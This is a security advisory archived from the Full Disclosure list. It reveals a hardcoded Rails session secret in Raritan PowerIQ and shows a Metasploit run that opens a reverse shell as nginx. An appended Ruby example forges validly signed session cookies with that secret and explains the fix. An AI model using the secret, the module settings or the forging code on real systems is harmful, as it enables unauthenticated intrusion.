Full Disclosure mailing list archives

Raritan PowerIQ known session secret
From: Brandon Perry <bperry.volatile () gmail com>

Date: Wed, 11 Mar 2015 19:57:17 -0500

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface with a hardcoded session secret of 8e238c9702412d475a4c44b7726a0537. This can be used to achieve unauthenticated remote code execution as the nginx user on vulnerable systems.

msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting                                   Required  Description
   ----             ---------------                                   --------  -----------
   COOKIE_NAME                                                        no        The name of the session cookie
   DIGEST_NAME      SHA1                                              yes       The digest type used to HMAC the session cookie
   HTTP_METHOD      GET                                               yes       The HTTP request method (GET, POST, PUT typically work)
   Proxies                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RAILSVERSION     3                                                 yes       The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            192.168.0.20                                      yes       The target address
   RPORT            443                                               yes       The target port
   SALTENC          BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==  yes  The encrypted cookie salt
   SALTSIG          42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8          yes       The signed encrypted cookie salt
   SECRET           8e238c9702412d475a4c44b7726a0537                  yes       The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)
   TARGETURI        /login/login                                      yes       The path to a vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true                                              no        Only send the payload if the session cookie is validated
   VHOST                                                              no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches!
[*] Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
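The post states the mechanism in one sentence: Rails 2's cookie store only HMAC-signs the session, so whoever holds the secret can sign arbitrary Marshal data and the application will deserialize it. The Ruby below is an added example (not Brandon Perry's code and not part of the Metasploit module) that reimplements the Rails 2 MessageVerifier format to show the two practical consequences: an offline check that a candidate secret reproduces a captured signature (the test the module reports as "SECRET matches!"), and the fact that signature verification is the only gate in front of Marshal.load. The secret and the SALTENC cookie data are taken from the post; the session hash that gets forged is constructed for the example, and no deserialization gadget is included.

```ruby
require 'openssl'
require 'base64'

# Hardcoded secret_token from the advisory (PowerIQ 4.1 - 4.3).
POWERIQ_SECRET = '8e238c9702412d475a4c44b7726a0537'

# The SALTENC value pasted in the msf output: the data half of a captured Rails 2
# session cookie, i.e. Base64(Marshal.dump(session_hash)) without the "--<hmac>" tail.
POWERIQ_SESSION_DATA = 'BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw=='

# Rails 2 CookieStore / MessageVerifier layout: "<base64(Marshal.dump(hash))>--<hex HMAC-SHA1(secret, base64)>".
def sign_session(session, secret)
  data = Base64.strict_encode64(Marshal.dump(session))
  "#{data}--#{OpenSSL::HMAC.hexdigest('SHA1', secret, data)}"
end

# Constant-time comparison, as Rails' own secure_compare does.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Offline secret check: does HMAC-SHA1(secret, data) reproduce the signature on the
# cookie? Given any one captured cookie this confirms a leaked secret without
# touching the target; it is the check behind "[+] SECRET matches!".
def check_secret(cookie, secret)
  data, digest = cookie.split('--', 2)
  return false if data.nil? || digest.nil?
  secure_compare(OpenSSL::HMAC.hexdigest('SHA1', secret, data), digest)
end

# Decode the data half only. Safe for the captured PowerIQ value, which holds
# nothing but Strings and booleans; never do this on untrusted input.
def decode_session_data(data)
  Marshal.load(Base64.decode64(data))
end

# Mirror of the server-side path: signature check, then Marshal.load. Nothing else
# stands between a correctly signed cookie and the deserializer, which is why a
# known secret is equivalent to unauthenticated code execution here.
def verify_session(cookie, secret)
  return nil unless check_secret(cookie, secret)
  decode_session_data(cookie.split('--', 2).first)
end

if __FILE__ == $PROGRAM_NAME
  # What the captured cookie actually carried.
  p decode_session_data(POWERIQ_SESSION_DATA)

  # Constructed session (not from the post): anyone holding the secret can mint it.
  forged = sign_session({ 'session_id' => 'a' * 32, 'licensed' => true }, POWERIQ_SECRET)
  p verify_session(forged, POWERIQ_SECRET)     # accepted by the app's verifier
  p verify_session(forged, 'some-other-secret') # nil: a per-install secret would reject it

  # The same check against the captured SALTENC/SALTSIG pair from the post.
  p check_secret("#{POWERIQ_SESSION_DATA}--42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8", POWERIQ_SECRET)
end
```

Two points worth noting when reading the output. The captured session decodes to plain strings and booleans (skey, licensed, session_id, return_to), so decoding it is harmless; the danger is entirely on the server side, where verify_session hands whatever passed the HMAC to Marshal.load. And the fix is the one the post implies: a secret generated per install (and rotated on disclosure), since the signature scheme itself is sound only while the key is private.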